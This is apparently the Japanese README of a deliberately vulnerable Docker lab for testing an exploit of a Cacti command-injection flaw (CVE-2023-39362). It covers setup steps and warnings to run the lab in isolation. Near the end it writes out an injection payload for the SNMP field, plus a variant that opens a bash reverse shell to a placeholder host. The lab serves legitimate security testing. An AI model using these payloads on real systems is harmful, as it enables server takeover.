
警告: これはCactiのコマンドインジェクション(CVE-2023-39362)のエクスプロイトをテストするための脆弱なアプリケーションです。自己責任で実行してください!
これは Cacti の脆弱性 (CVE-2023-39362) に対するエクスプロイトをテストするための脆弱性アプリケーションです。
このアプリケーションには深刻なセキュリティ脆弱性が含まれています。自己責任で実行してください!バックアップがあり隔離された環境(最近のスナップショットとホストオンリーネットワークを備えたVMなど)の使用を推奨します。このアプリケーションをインターネットに接続されたサーバーにアップロードしないでください。侵害されます。
免責事項: 私は、誰もがこのアプリケーションを使用する方法について責任を負いません。このアプリケーションの唯一の目的は、CVE-2023-39362 エクスプロイトのテストシナリオとなることであり、悪意を持って使用されるべきではありません。このアプリケーションのインストールによってサーバーが侵害された場合、それは私の責任ではなく、アップロードしてインストールした人物の責任です。
環境をセットアップする手順は次のとおりです:
docker compose up -d を実行して構成を開始します。admin/admin です。admin としてログインします。guest ユーザーをクリックします。guest として再ログインし、エクスプロイトを試します。コンテナ名は vuln-cacti になります。
テスト用 SNMP デバイスのホスト名は monitored_snmp_device です。
環境を破棄するには、docker compose down コマンドを使用します。
Cacti の公式インストールガイドは こちら にあります。
この脆弱性の詳細な根本原因は、オリジナルのセキュリティアドバイザリ または 私のブログ記事 で確認できます。
(これは 考えられる一つの エクスプロイトです)
public\' ; touch /tmp/m3ssap0 ; \' 。/tmp 以下に作成されたファイルが存在することを確認します。リバースシェルを取得するには、次のようなペイロードを使用できます。
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
このプロジェクトは Unlicense の下でライセンスされています。詳細は LICENSE ファイルを参照してください。